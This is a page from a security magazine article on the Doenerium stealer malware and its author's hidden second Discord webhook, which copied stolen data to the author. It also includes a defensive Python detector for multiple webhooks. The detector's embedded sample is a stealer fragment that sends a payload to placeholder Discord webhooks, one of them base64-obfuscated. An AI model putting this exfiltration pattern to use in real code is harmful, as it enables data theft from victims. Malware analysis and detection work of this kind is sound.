Page 70 - Cyber Defense eMagazine December 2022 Edition
After the malware has harvested all the data, it creates a complete virtual profile for the victim, which is
archived and uploaded to gofile.io – a free file sharing and storing platform. The malware author leverages
gofile.io to host the archive and share it with the hacker.
Part Two: The Backdoor Twist
Further research into the attack revealed that doener2323, the malware author, had also created a
second GitHub repository called 1337wtf1337. Both accounts were linked using a technique known as
“Dual Hooking”: in addition to the webhook that the hacker configures in the malware (the one to which
exfiltrated data is copied), the malware contains a second Discord webhook associated with doener2323.
In other words, everything a hacker achieved using this malware was automatically shared with
doener2323.
The dual hook was removed on September 3, 2022, but not before Doener created a separate,
completely obfuscated JavaScript file. When decoded, this file led to an open Discord server for sharing
the active hackers’ profits and updating users about new features and fixes.
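The dual-hook pattern described above is something a malware analyst can check for statically: a stealer that legitimately needs one exfiltration webhook has no reason to carry two. The following is an added example, not code from the article or from the Doenerium project, that scans a script for Discord webhook URLs, both in plaintext and inside base64-encoded string literals (a simplified stand-in for the obfuscation the article mentions), and flags the sample when more than one distinct webhook ID is present. The embedded JavaScript sample and its webhook IDs and tokens are constructed placeholders.

```python
import base64
import re

# Constructed sample (not the real Doenerium code): a stealer fragment that embeds
# two Discord webhooks. One is in plaintext, the other is base64-encoded so that a
# naive grep for "discord.com/api/webhooks" would only find the operator's hook.
# IDs and tokens are placeholders, not real webhook credentials.
SAMPLE_JS = r'''
const operatorHook = "https://discord.com/api/webhooks/111111111111111111/OPERATOR_TOKEN_PLACEHOLDER";
// hidden second hook belonging to the malware author
const hidden = atob("aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMjIyMjIyMjIyMjIyMjIyMjIyL0FVVEhPUl9UT0tFTl9QTEFDRUhPTERFUg==");
function exfil(payload) {
  for (const url of [operatorHook, hidden]) {
    fetch(url, { method: "POST", body: payload });
  }
}
'''

# Discord webhook URL: host variants, then /api/webhooks/<id>/<token>
WEBHOOK_RE = re.compile(
    r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_\-]+)"
)
# Quoted string literals made only of base64 alphabet characters (16+ chars, optional padding)
B64_LITERAL_RE = re.compile(r"[\"']([A-Za-z0-9+/]{16,}={0,2})[\"']")


def decoded_base64_literals(source):
    """Yield the decoded text of every quoted literal that is valid base64 and decodes to printable ASCII."""
    for match in B64_LITERAL_RE.finditer(source):
        try:
            text = base64.b64decode(match.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            # Not base64, bad padding, or not ASCII: ignore this literal
            continue
        if text.isprintable():
            yield text


def find_webhooks(source):
    """Return the set of distinct Discord webhook IDs found in plaintext or inside base64 literals."""
    texts = [source, *decoded_base64_literals(source)]
    webhook_ids = set()
    for text in texts:
        for match in WEBHOOK_RE.finditer(text):
            webhook_ids.add(match.group(1))  # keep the ID only; the token is a secret
    return webhook_ids


def assess(source):
    """Summarise the sample: which webhook IDs it contacts and whether it is dual-hooked."""
    webhook_ids = find_webhooks(source)
    return {"webhook_ids": sorted(webhook_ids), "dual_hook": len(webhook_ids) > 1}


if __name__ == "__main__":
    result = assess(SAMPLE_JS)
    print("webhook IDs:", result["webhook_ids"])
    print("dual hook:", result["dual_hook"])
```

Only the webhook ID is recorded, which is enough to block the URL at an egress proxy or to report it for takedown, without copying the token into analyst notes. Real stealers use heavier obfuscation than a single `atob` call, so in practice this check runs on the deobfuscated script rather than on the raw file.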
Initially, Doener2323 and their partners weren’t shy about informing other Discord users about their goal.
They openly explained that the purpose was monetization and that the webhook was part of a bigger
crypto mining operation for Doener2323, which infects any victims that are lured by active hackers using
Doenerium.
When other users started catching on, Doener became less enthusiastic about the possibility that they
might share in the spoils, and removed them from the Discord chat.
Recommendations
This attack (and its double-crossing backdoor) teaches us that nothing comes free – not even the stolen
fruits of malware. The hackers who utilized this publicly accessible malware to steal sensitive data were
ultimately themselves hacked in turn by a malware author growing their own crypto mining operation.
Like many dangerous phishing attacks, this sophisticated attack began with a simple email. Considering
that about 1 in 5 phishing attempts evade Microsoft’s default security offering and actually reach users’
inboxes, it is essential that security leaders ensure their organizations are provided with the most
advanced safeguards.
The first line of defense against this type of attack must be user education around email
security. Regular email security drills can help employees better identify genuinely suspicious content,
remind them not to open strange files, links, or attachments, and prompt them to double-check the identity of the sender.
Organizations should also establish a standardized process for employees to follow when they receive a
suspicious email or link.
Copyright © 2022, Cyber Defense Magazine. All rights reserved worldwide.